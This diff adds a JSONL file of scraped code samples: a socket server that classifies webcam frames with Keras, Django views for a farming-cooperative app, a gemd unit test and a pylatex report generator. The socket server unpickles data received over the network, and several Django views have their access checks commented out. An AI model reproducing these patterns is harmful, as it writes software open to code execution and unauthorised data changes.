diff --git "a/229.jsonl" "b/229.jsonl" new file mode 100644--- /dev/null +++ "b/229.jsonl" @@ -0,0 +1,572 @@ +{"seq_id":"56810438","text":"import socket\nimport sys\nimport cv2\nimport pickle\nimport numpy as np\nimport struct # new\nimport zlib\nimport os\nimport time\nfrom keras.models import load_model\nfrom keras.preprocessing import image\n# Another File Python\nimport summary\nfrom summary import summariseTheResult\nimport koneksi\n\nkoneksi.savelog\n\n# Load Model\nmodel = load_model(\"/home/pandu/Documents/eksperimen/model/16jun21.h5\")\nos.system(\"clear\")\n\n# Set Connection\nHOST = 'localhost'\nPORT = 8080\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nprint('Socket created')\ns.bind((HOST, PORT))\nprint('Socket bind complete')\ns.listen(10)\nprint('Socket now listening')\n\nconn, addr = s.accept()\ndata = b\"\"\npayload_size = struct.calcsize(\">L\")\nprint(\"payload_size: {}\".format(payload_size))\n# End Set connection\n\n\ntotalFrames = 0\nnoAction = 0\nlabels = ['1', '2', '3', '4', '5', '6', 'Tidak ada gerakan']\n\nposeCount = np.zeros(7, dtype=int)\n\nnotResponse = 0\n\ndef showJson(poseCount, totalFrames):\n hasil = {\n \"NumPose\": poseCount,\n \"NumFrame\": totalFrames\n }\n # print(poseCount)\n koneksi.saveHistory(poseCount, totalFrames)\n print(\"Berhasil memasukan ke database\")\n print('close')\n \n\nwhile True:\n while len(data) < payload_size:\n print(\"Recv: {}\".format(len(data)))\n \n # If not receive data\n if len(data) < payload_size:\n notResponse += 1\n print(notResponse)\n print(\"tidak merespon\")\n # if notResponse > 500:\n # showJson(poseCount, totalFrames)\n # break\n\n data += conn.recv(4096)\n\n print(\"Done Recv: {}\".format(len(data)))\n packed_msg_size = data[:payload_size]\n data = data[payload_size:]\n msg_size = struct.unpack(\">L\", packed_msg_size)[0]\n print(\"msg_size: {}\".format(msg_size))\n while len(data) < msg_size:\n data += conn.recv(4096)\n frame_data = data[:msg_size]\n data = data[msg_size:]\n\n frame = pickle.loads(frame_data, fix_imports=True, encoding=\"bytes\")\n frame = cv2.imdecode(frame, cv2.IMREAD_COLOR)\n\n # Mengirim Pesan dari Several\n\n \n # Menerima Pesan dari klien\n # message = conn.recv(1024).decode(\"UTF-8\")\n # print(message)\n\n\n\n\n # Predict Image\n test_image = image.img_to_array(frame)\n test_image = np.expand_dims(test_image, axis=0)\n result = model.predict(test_image)\n poseIdx = np.argmax(result, axis=1)\n\n print(\"Gerakan terdeteksi gerakan :\" + str(labels[np.argmax(result)]))\n poseCount[poseIdx[0]] = poseCount[poseIdx[0]] + 1\n totalFrames += 1\n\n\n\n # If not action\n label = labels[np.argmax(result)]\n if label == \"Tidak ada gerakan\":\n print(noAction)\n noAction += 1\n if noAction > 50:\n showJson(poseCount, totalFrames)\n break\n else:\n noAction = 0\n\n cv2.imshow('ImageWindow', frame)\n cv2.waitKey(1)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n showJson(poseCount, totalFrames)\n break\n\n\n\n\ncv2.destroyAllWindows()\ns.close()\nconn.close()\n\n# os.execv(__file__, sys.argv)\nos.system(\"python3 /home/pandu/Documents/eksperimen/eksperimenClasify/testAnotherFile/server.py\")\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"618251257","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.models import Group\n# from 
django.contrib.gis.serializers import geojson\nfrom django.core.serializers import serialize\nfrom django.db.models import Sum\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.urls import reverse\nimport folium\nimport json\n\nfrom parametres.forms import UserForm\nfrom parametres.models import Projet\nfrom .forms import CoopForm, ProdForm, EditProdForm, ParcelleForm, PlantingForm, SectionForm, Sous_SectionForm\nfrom .models import Cooperative, Section, Sous_Section, Producteur, Parcelle, Planting, Formation, Detail_Formation\n\n\ndef is_cooperative(user):\n return user.groups.filter(name='COOPERATIVES').exists()\n\n#@login_required(login_url='connexion')\n#@user_passes_test(is_cooperative)\ndef cooperative(request, id=None):\n coop = get_object_or_404(Cooperative, pk=id)\n producteurs = Producteur.objects.all().filter(section__cooperative_id= coop)\n nb_producteurs = Producteur.objects.all().filter(section__cooperative_id= coop).count()\n parcelles = Parcelle.objects.all().filter(propietaire__section__cooperative_id=coop)\n nb_parcelles = Parcelle.objects.all().filter(propietaire__section__cooperative_id=coop).count()\n context = {\n \"coop\": coop,\n 'cooperative': cooperative,\n 'producteurs': producteurs,\n 'nb_producteurs': nb_producteurs,\n 'parcelles': parcelles,\n 'nb_parcelles': nb_parcelles,\n }\n return render(request, \"cooperatives/dashboard.html\", context)\n\ndef coop_dashboard(request):\n cooperative= Cooperative.objects.get(user_id=request.user.id)\n producteurs = Producteur.objects.all().filter(cooperative_id=cooperative)\n nb_producteurs = Producteur.objects.all().filter(cooperative_id=cooperative).count()\n nb_formations = Formation.objects.all().filter(cooperative_id=cooperative).count()\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n nb_parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative).count()\n Superficie = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative).aggregate(total=Sum('superficie'))['total']\n Plants = Planting.objects.all().filter(parcelle__producteur__cooperative_id=cooperative).aggregate(total=Sum('nb_plant'))['total']\n\n context={\n 'cooperative':cooperative,\n 'producteurs': producteurs,\n 'nb_formations': nb_formations,\n 'nb_producteurs': nb_producteurs,\n 'parcelles': parcelles,\n 'nb_parcelles': nb_parcelles,\n 'Superficie' : Superficie,\n 'Plants': Plants,\n }\n return render(request,'cooperatives/dashboard.html',context=context)\n\ndef add_coop(request):\n userForm=UserForm()\n coopForm=CoopForm()\n if request.method=='POST':\n userForm=UserForm(request.POST)\n coopForm=coopForm(request.POST,request.FILES)\n if userForm.is_valid() and coopForm.is_valid():\n user=userForm.save()\n user.set_password(user.password)\n user.save()\n cooperative=coopForm.save(commit=False)\n cooperative.user=user\n cooperative=cooperative.save()\n print(cooperative)\n cooperative_group = Group.objects.get_or_create(name='COOPERATIVES')\n cooperative_group[0].user_set.add(user)\n messages.success(request, \"Utilisateur Ajouté avec succès\")\n return HttpResponseRedirect(reverse('accueil'))\n context = {\n 'userForm': userForm,\n 'coopForm': coopForm\n }\n return render(request,'cooperatives/add_coop.html',context=context)\n\ndef add_section(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n sections = Section.objects.all().filter(cooperative_id=cooperative)\n form = 
SectionForm()\n if request.method == 'POST':\n form = SectionForm(request.POST)\n if form.is_valid():\n section = form.save(commit=False)\n section.cooperative_id = cooperative.id\n section = section.save()\n # print()\n messages.success(request, \"Section Ajoutée avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:section'))\n context = {\n \"cooperative\": cooperative,\n \"sections\": sections,\n 'form': form,\n }\n return render(request, \"cooperatives/sections.html\", context)\n\ndef add_sous_section(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n sections = Section.objects.all().filter(cooperative_id=cooperative)\n sous_sections = Sous_Section.objects.all().filter(section__cooperative_id=cooperative)\n form = Sous_SectionForm()\n if request.method == 'POST':\n form = Sous_SectionForm(request.POST)\n if form.is_valid():\n sous_section = form.save(commit=False)\n for section in sections:\n sous_section.section_id = section.id\n sous_section = sous_section.save()\n # print()\n messages.success(request, \"Sous Section Ajoutée avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:sous_sections'))\n context = {\n \"cooperative\": cooperative,\n \"sous_sections\": sous_sections,\n \"sections\": sections,\n 'form': form,\n }\n return render(request, \"cooperatives/sous_sections.html\", context)\n\ndef producteurs(request):\n cooperative = request.user.cooperative #Cooperative.objects.get(user_id=request.user.id)\n producteurs = Producteur.objects.all().filter(cooperative_id=cooperative)\n sections = Section.objects.filter(cooperative_id=cooperative)\n # parcelles = Parcelle.objects.all().filter(propietaire__cooperative_id=cooperative)\n\n prodForm = ProdForm()\n if request.method == 'POST':\n prodForm = ProdForm(request.POST, request.FILES)\n if prodForm.is_valid():\n producteur = prodForm.save(commit=False)\n producteur.cooperative_id = cooperative.id\n for section in sections:\n producteur.section_id = section.id\n producteur = producteur.save()\n print(producteur) \n messages.success(request, \"Producteur Ajouté avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:producteurs'))\n\n context = {\n \"cooperative\":cooperative,\n \"producteurs\": producteurs,\n 'prodForm': prodForm,\n 'sections':sections\n }\n return render(request, \"cooperatives/producteurs.html\", context)\n\ndef my_section(request):\n cooperative = request.GET.get(\"user_id\")#Cooperative.objects.get(user_id=request.user.id)\n coop_sections = Section.objects.filter(cooperative_id=cooperative)\n context = {'coop_sections': coop_sections}\n return render(request, 'cooperatives/section.html', context)\n\ndef prod_update(request, code=None):\n\tinstance = get_object_or_404(Producteur, code=code)\n\tform = EditProdForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Producteur Modifié Avec Succès\", extra_tags='html_safe')\n\t\treturn HttpResponseRedirect(reverse('cooperatives:producteurs'))\n\n\tcontext = {\n\t\t\"instance\": instance,\n\t\t\"form\":form,\n\t}\n\treturn render(request, \"cooperatives/prod_edt.html\", context)\n\ndef prod_delete(request, code=None):\n item = get_object_or_404(Producteur, code=code)\n if request.method == \"POST\":\n item.delete()\n messages.error(request, \"Producteur Supprimer Avec Succès\")\n return redirect('cooperatives:producteurs')\n context = {\n 'item': item,\n }\n return 
render(request, 'cooperatives/prod_delete.html', context)\n\ndef parcelles(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n prods = Producteur.objects.filter(cooperative_id=cooperative)\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n parcelleForm = ParcelleForm(request.POST or None)\n if request.method == 'POST':\n parcelleForm = ParcelleForm(request.POST, request.FILES)\n if parcelleForm.is_valid():\n parcelle = parcelleForm.save(commit=False)\n\n # parcelle.producteur_id = prods\n # for prod in prods:\n # parcelle.producteur_id = prod.\n parcelle = parcelle.save()\n print(parcelle)\n messages.success(request, \"Parcelle Ajoutés avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:parcelles'))\n\n context = {\n \"cooperative\":cooperative,\n \"parcelles\": parcelles,\n 'parcelleForm': parcelleForm,\n 'producteurs': prods\n }\n return render(request, \"cooperatives/parcelles.html\", context)\n\ndef parcelle_delete(request, id=None):\n parcelle = get_object_or_404(Parcelle, id=id)\n parcelle.delete()\n messages.success(request, \"Parcelle Supprimer avec Succès\")\n return HttpResponseRedirect(reverse('cooperatives:parcelles'))\n\ndef planting(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n #producteurs = Producteur.objects.all().filter(cooperative=cooperative)\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n plantings = Planting.objects.all().filter(parcelle__producteur__cooperative_id=cooperative)\n plantingForm = PlantingForm()\n if request.method == 'POST':\n plantingForm = PlantingForm(request.POST, request.FILES)\n if plantingForm.is_valid():\n planting = plantingForm.save(commit=False)\n planting = planting.save()\n print(planting)\n messages.success(request, \"Parcelle Ajoutés avec succès\")\n return HttpResponseRedirect(reverse('cooperatives:planting'))\n\n context = {\n \"cooperative\":cooperative,\n \"plantings\": plantings,\n 'plantingForm': plantingForm,\n }\n return render(request, \"cooperatives/plantings.html\", context)\n\ndef planting_update(request, id=None):\n\tinstance = get_object_or_404(Planting, id=id)\n\tform = PlantingForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Modification effectuée avec succès\")\n\t\treturn HttpResponseRedirect(reverse('cooperatives:planting'))\n\n\tcontext = {\n\t\t\"instance\": instance,\n\t\t\"form\":form,\n\t}\n\treturn render(request, \"cooperatives/planting_edit.html\", context)\n\n#-------------------------------------------------------------------------\n## Export to Excel\n#-------------------------------------------------------------------------\n\nimport csv\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\n\ndef export_producteur_csv(request):\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"producteurs.csv\"'\n\n writer = csv.writer(response)\n writer.writerow(['CODE', 'TYPE', 'SECTION', 'GENRE', 'NOM', 'PRENOMS', 'CONTACTS'])\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n # producteurs = Producteur.objects.all().filter(cooperative=cooperative)\n\n producteurs = Producteur.objects.all().filter(cooperative_id=cooperative.id).values_list(\n 'code',\n 'type_producteur',\n 'section__libelle',\n 'genre',\n 'nom',\n 'prenoms',\n 
'contacts',\n )\n for p in producteurs:\n writer.writerow(p)\n\n return response\n\n\nimport xlwt\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth.models import User\n\ndef export_prod_xls(request):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=\"producteurs.xls\"'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('Producteurs')\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['COOPERATIVE', 'CODE', 'TYPE', 'SECTION', 'GENRE', 'NOM', 'PRENOMS', 'CONTACTS']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n rows = Producteur.objects.all().filter(cooperative_id=cooperative.id).values_list(\n 'cooperative__sigle',\n 'code',\n 'type_producteur',\n 'section__libelle',\n 'genre',\n 'nom',\n 'prenoms',\n 'contacts',\n )\n for row in rows:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n\n wb.save(response)\n return response\n\ndef export_parcelle_xls(request):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=\"Parcelles.xls\"'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('Parcelles')\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['CODE', 'P.NOM', 'P.PRENOMS', 'CERTIFI', 'CULTURE', 'SUPER', 'LONG', 'LAT', 'SECTION']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n rows = Parcelle.objects.all().filter(propietaire__cooperative_id=cooperative.id).values_list(\n 'code',\n 'propietaire__nom',\n 'propietaire__prenoms',\n 'certification',\n 'culture',\n 'superficie',\n 'longitude',\n 'latitude',\n 'section__libelle',\n )\n for row in rows:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n\n wb.save(response)\n return response\n\ndef export_plant_xls(request):\n response = HttpResponse(content_type='application/ms-excel')\n response['Content-Disposition'] = 'attachment; filename=\"Planting.xls\"'\n\n wb = xlwt.Workbook(encoding='utf-8')\n ws = wb.add_sheet('Plants')\n\n # Sheet header, first row\n row_num = 0\n\n font_style = xlwt.XFStyle()\n font_style.font.bold = True\n\n columns = ['P.CODE', 'P.NOM', 'P.PRENOMS', 'PARCELLE', 'ESPECE', 'NOMBRE', 'DATE']\n\n for col_num in range(len(columns)):\n ws.write(row_num, col_num, columns[col_num], font_style)\n\n # Sheet body, remaining rows\n font_style = xlwt.XFStyle()\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n rows = Planting.objects.all().filter(parcelle__propietaire__cooperative_id=cooperative.id).values_list(\n 'parcelle__propietaire__code',\n 'parcelle__propietaire__nom',\n 'parcelle__propietaire__prenoms',\n 'parcelle__code',\n 'espece',\n 'nb_plant',\n 'date',\n )\n for row in rows:\n row_num += 1\n for col_num in range(len(row)):\n ws.write(row_num, col_num, row[col_num], font_style)\n\n wb.save(response)\n return response\n\nfrom io import BytesIO\nfrom reportlab.pdfgen import canvas\nfrom django.http import HttpResponse\n\ndef 
export_prod_pdf(request):\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = 'inline; filename=\"Producteurs.pdf\"'\n\n buffer = BytesIO()\n p = canvas.Canvas(buffer)\n\n # Start writing the PDF here\n p.drawString(100, 100, 'Hello world.')\n # End writing\n\n p.showPage()\n p.save()\n\n pdf = buffer.getvalue()\n buffer.close()\n response.write(pdf)\n\n return response\n\nfrom django.shortcuts import render\nfrom django.core.serializers import serialize\nfrom django.http import HttpResponse\n\n# def localisation(request):\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative).values('latitude', 'longitude')\n# json_res = []\n# for parcelle in parcelles:\n# json_obj = dict(\n# myproperty=parcelle\n# )\n# json_res.append(json_obj)\n# # map = folium.Map(location=[5.349390, -4.017050], zoom_start=8)\n# # for p in [parcelles]:\n# # print(parcelles)\n# # print(p)\n# # # marker de depart\n# # folium.Marker(parcelles[p],\n# # icon=folium.Icon(color='darkblue',\n# # icon_color='white',\n# # icon='male',\n# # angle=0,\n# # prefix='fa')).add_to(map) # icon=folium.Icon(color='purple'))\n# # # map.add_child(coordonnees)\n# # map = map._repr_html_()\n# context = {\n# 'parcelles': parcelles\n# }\n# return render(request, 'cooperatives/map.html', context)\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n# dict = list(parcelles.values())\n# for point, latitude, longitude in dict:\n# print(dict)\n# # if point:\n# latlon = [(latitude, longitude)]\n# map = folium.Map(location=[5.349390, -4.017050], zoom_start=8)\n# for p in range(len([latlon])):\n# # latlon +=p\n# # print(p)\n# # marker de depart\n# folium.Marker(latlon[p],\n# popup=point.producteur,\n# tooltip=point.projet.titre,\n# icon=folium.Icon(color='darkblue',\n# icon_color='white',\n# icon='male',\n# angle=0,\n# prefix='fa')).add_to(map)#icon=folium.Icon(color='purple'))\n# # map.add_child(coordonnees)\n# map = map._repr_html_()\n# context = {\n# 'carte': map,\n# 'point':point,\n# 'latlon' :latlon\n# }\n# return render(request, 'cooperatives/calcul_dstce.html', context)\n# # folium.Marker(location=[coord[0], coord[1]], fill_color='#43d9de', radius=8).add_to(map)\n# # map.save('cooperatives/map.html')\n# # return render(request, 'carte3.html')\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n# for parcelle in parcelles.values('latitude', 'longitude'):\n# print(parcelle)\n# # print(parcelle['latitude'], parcelle['longitude'])\n# latitude = (parcelle.latitude)\n# longitude = (parcelle.longitude)\n# # lon = parcelle.longitude\n# coordonne = [latitude,longitude]\n# map = folium.Map(location=[5.349390, -4.017050], zoom_start=12)\n# for point in coordonne:\n# # print(len(lat, lon))\n# folium.Marker(coordonne[point]).add_to(map)\n# context = {\n# 'map':map,\n# 'parcelle': parcelle,\n# }\n# return render(request, 'cooperatives/calcul_dstce.html', context)\n\n# def localisation(request):\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n# # data = serializers.serialize('json', parcelles)#json.dumps(parcelles)\n# data = serializers.serialize('json', Parcelle.objects.all().filter(producteur__cooperative_id=cooperative), 
fields=('latitude', 'longitude'))\n# # data = serializers.serialize('json', parcelles)#json.dumps(parcelles)\n# coordonnees = json.loads(data)\n# # print('point :', coordonnees)\n# # for p in coordonnees:\n# for latitude in list(parcelles.values()):\n# print('lat: ', latitude)\n# lat = coordonnees([latitude])\n# # long = coordonnees([longitude])\n# print(lat)\n# coordonne = [(lat)]\n# map = folium.Map(location=[5.349390, -4.017050], zoom_start=8)\n# for point in range(0, len([coordonne])):\n# folium.Marker(coordonne[point],\n# popup=point,\n# tooltip=point,\n# icon=folium.Icon(color='darkblue',\n# icon_color='white',\n# icon='male',\n# angle=0,\n# prefix='fa'\n# )).add_to(map)\n# # return render(request, 'carte3.html')\n# # map.add_child(coordonnees)\n# map = map._repr_html_()\n# context = {\n# 'carte': map,\n# # 'parcelle':parcelle,\n# # 'latlon' :latlon\n# }\n# return render(request, 'cooperatives/calcul_dstce.html', context)\n# # folium.Marker([lat], long)\n\n\n\n\n\n\ndef localisation(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n parcelles = Parcelle.objects.all().filter(producteur__cooperative_id=cooperative)\n # parcelles = Planting.objects.filter(parcelle__producteur__cooperative_id=cooperative).all()\n context = {\n 'parcelles' : parcelles\n }\n return render(request, 'cooperatives/carte.html', context)\n # places = serialize('geojson', parcelles)\n # print(\"parcelles :\", parcelles)\n # print(\"places :\", places)\n # return HttpResponse(places, content_type='json')\n\n# def load_section(request):\n# cooperative = Cooperative.objects.get(user_id=request.user.id)\n# cooperative_id = request.GET.get('cooperative')\n# # section_id = Section.objects.filter(cooperative_id = cooperative_id)\n# sections = Section.objects.filter(cooperative_id = cooperative_id)\n# producteurs = Producteur.objects.filter(cooperative_id=cooperative)\n# # parcelle_id = Parcelle.objects.filter(producteur_id=producteur_id)\n# # parcelle_id = Parcelle.objects.filter(producteur_id=producteur_id)\n# # cities = City.objects.filter(country_id=country_id).order_by('name')\n# context = {\n# 'sections':sections,\n# 'producteurs':producteurs,\n# }\n# return render(request, 'cooperatives/producteur_dropdown.html', context)\n\ndef formation(request):\n cooperative = Cooperative.objects.get(user_id=request.user.id)\n formations = Formation.objects.all().filter(cooperative_id=cooperative)\n context = {\n 'cooperative': cooperative,\n 'formations': formations,\n }\n return render(request, 'cooperatives/formations.html', context)\n\ndef detail_formation(request, id=None):\n instance = get_object_or_404(Formation, id=id)\n detail = Detail_Formation.objects.all().filter(formation_id=instance)\n # participants = Producteur.objects.all().filter(formation_id=formation)\n context = {\n 'instance':instance,\n 'detail':detail,\n # 'participants': participants,\n }\n return render(request, 'cooperatives/detail_formation.html', context)","sub_path":"cooperatives/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"324695610","text":"\"\"\"Test of CategoricalBounds.\"\"\"\nimport pytest\n\nfrom gemd.json import dumps, loads\nfrom gemd.entity.bounds.molecular_structure_bounds import MolecularStructureBounds\nfrom gemd.entity.bounds.real_bounds import RealBounds\n\n\ndef test_contains():\n \"\"\"Test basic contains logic.\"\"\"\n bounds = MolecularStructureBounds()\n assert 
bounds.contains(MolecularStructureBounds())\n assert not bounds.contains(RealBounds(0.0, 2.0, ''))\n assert not bounds.contains(None)\n with pytest.raises(TypeError):\n bounds.contains('c1(C=O)cc(OC)c(O)cc1')\n with pytest.raises(TypeError):\n bounds.contains('InChI=1/C8H8O3/c1-11-8-4-6(5-9)2-3-7(8)10/h2-5,10H,1H3')\n\n\ndef test_json():\n \"\"\"Test that serialization works (empty dictionary).\"\"\"\n bounds = MolecularStructureBounds()\n copy = loads(dumps(bounds))\n assert copy == bounds\n","sub_path":"gemd/entity/bounds/tests/test_molecular_structure_bounds.py","file_name":"test_molecular_structure_bounds.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"651721502","text":"import numpy as np\n\nfrom pylatex import Document, Section, Subsection, Subsubsection, Tabular, Math, TikZ, Axis, Plot, Figure, Matrix, Alignat\nfrom pylatex import PageStyle, Head, MiniPage, Foot, HugeText, LargeText, MediumText, SmallText, NewLine, NewPage, LineBreak, simple_page_number, NoEscape\nfrom pylatex import Itemize, Enumerate, Description, Command\nfrom pylatex.utils import italic, bold\nfrom pylatex.package import Package\n\nfrom db.database import db_session\nfrom db.models import Evaluation, Step, Sign, Report\n\nfrom web.frontend import app\nfrom web.frontend.utils import get_file_name\n\ndef _get_header(doc, ev):\n\theader = PageStyle(\"header\")\n\n\twith header.create(Head(\"L\")):\n\t\theader.append(\"Final Report\")\n\t\theader.append(LineBreak())\n\t\theader.append(\"Created on 21/07/2017\")\n\n\twith header.create(Head(\"C\")):\n\t\theader.append(\"Author\")\n\t\theader.append(LineBreak())\n\t\theader.append(bold(ev.user.__str__()))\n\n\twith header.create(Head(\"R\")):\n\t\theader.append(simple_page_number())\n\n\t#with header.create(Foot(\"L\")):\n\t# header.append(\"Left Footer\")\n\n\t#with header.create(Foot(\"C\")):\n\t# header.append(\"Center Footer\")\n\n\t#with header.create(Foot(\"R\")):\n\t# header.append(\"Right Footer\")\n\n\tdoc.preamble.append(header)\n\tdoc.change_document_style(\"header\")\n\n\twith doc.create(MiniPage(align='c')):\n\t\tdoc.append(MediumText(\"Evaluation of\"))\n\t\tdoc.append(LineBreak())\n\t\tdoc.append(HugeText(bold(ev.title)))\n\n\treturn doc\n\ndef _out_new_lines(text):\n\tp = text.split('\\r\\n')\n\treturn p\n\ndef generate_files(evaluation_id,output):\n\n\tev=name=None\n\n\tif evaluation_id: \n\t\tev = db_session.query(Evaluation).get(evaluation_id)\n\n\t\tif ev:\n\t\t\t\n\t\t\tname = get_file_name()\n\t\t\tfile = '/'.join([app.config['REPORT_FILES'],name])\n\n\t\t\tgeometry_options = {\"tmargin\": \"3cm\", \"lmargin\": \"3cm\"}\n\n\t\t\tdoc = Document(geometry_options=geometry_options)\n\t\t\t\n\t\t\tdoc = _get_header(doc,ev)\n\n\t\t\twith doc.create(Section('PREPARATION')):\n\n\t\t\t\tif ev.preparation:\n\n\t\t\t\t\twith doc.create(Subsection(\"Purpose of inspection:\")):\n\t\t\t\t\t\tfor p in _out_new_lines(ev.preparation.purpose_of_inspection):\n\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\twith doc.create(Subsection(\"Informal inspection:\")):\n\t\t\t\t\t\tfor p in _out_new_lines(ev.preparation.informal_inspection):\n\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\twith doc.create(Subsection(\"Focus inspection: \")):\n\t\t\t\t\t\tfor p in _out_new_lines(ev.preparation.focus_inspection):\n\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\twith 
doc.create(Subsection(\"Scenarios:\")):\n\n\t\t\t\t\t\tfor s in ev.scenarios:\n\t\t\t\t\t\t\twith doc.create(Subsubsection(s.alias)):\n\t\t\t\t\t\t\t\tfor p in _out_new_lines(s.description):\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\tdoc.append(NewPage())\n\n\t\t\tstep_type_map = {\n\t\t\t\t\"STEP_TYPE.METALINGUISTIC\" : \"Metalinguistic signs\",\n\t\t\t\t\"STEP_TYPE.STATIC\" : \"Static Signs\",\n\t\t\t\t\"STEP_TYPE.DYNAMIC\" : \"Dynamic Sings\"\n\t\t\t}\n\n\t\t\tfor step in ev.steps:\n\n\t\t\t\tif step:\n\n\t\t\t\t\twith doc.create(Section(step_type_map[str(step.step_phase)].upper())):\n\n\t\t\t\t\t\twith doc.create(Enumerate(enumeration_symbol=r\"\\alph*)\",\n\t\t\t\t\t\t\t\t\t\t\t\t options={'start': 1})) as enum:\n\n\t\t\t\t\t\t\tfor sing in step.signs:\n\t\t\t\t\t\t\t\tenum.add_item(\"Sign name: \".join([sing.sign_name,]))\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\t\t\tdoc.append(SmallText(sing.description))\n\t\t\t\t\n\t\t\t\t\t\t\t\tif sing.evidences:\n\t\t\t\t\t\t\t\t\twith doc.create(SmallText(\"Evidences:\")):\n\t\t\t\t\t\t\t\t\t\twith doc.create(Figure(position='h!')) as pic:\n\t\t\t\t\t\t\t\t\t\t\tfor e in sing.evidences:\n\t\t\t\t\t\t\t\t\t\t\t\timage_filename = \"/\".join([app.config['UPLOADED_FILES_DEST'], e.file])\n\t\t\t\t\t\t\t\t\t\t\t\tpic.add_image(image_filename, width='300px')\n\t\t\t\t\t\t\t\t\t\t\t\tcaption = \"Evidence of sign \".join([sing.sign_name,])\n\t\t\t\t\t\t\t\t\t\t\t\tpic.add_caption(caption)\n\t\t\t\t\t\n\t\t\t\t\t\t\t\tif sing.breakdowns:\n\t\t\t\t\t\t\t\t\twith doc.create(SmallText(\"Breakdowns:\")):\n\t\t\t\t\t\t\t\t\t\twith doc.create(Itemize()) as itemize:\n\t\t\t\t\t\t\t\t\t\t\tfor b in sing.breakdowns:\n\t\t\t\t\t\t\t\t\t\t\t\tfor p in _out_new_lines(b.description):\n\t\t\t\t\t\t\t\t\t\t\t\t\titemize.add_item(p)\n\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\twith doc.create(Subsection('METACOMUNICATION MESSAGE')):\n\t\t\t\t\t\twith doc.create(Description()) as desc:\n\t\t\t\t\t\t\tif step.who_you_are:\n\t\t\t\t\t\t\t\tps = _out_new_lines(step.who_you_are)\n\t\t\t\t\t\t\t\tdesc.add_item(\"Who are you:\", ps[0])\n\t\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\t\tif step.what_learned:\n\t\t\t\t\t\t\t\tps = 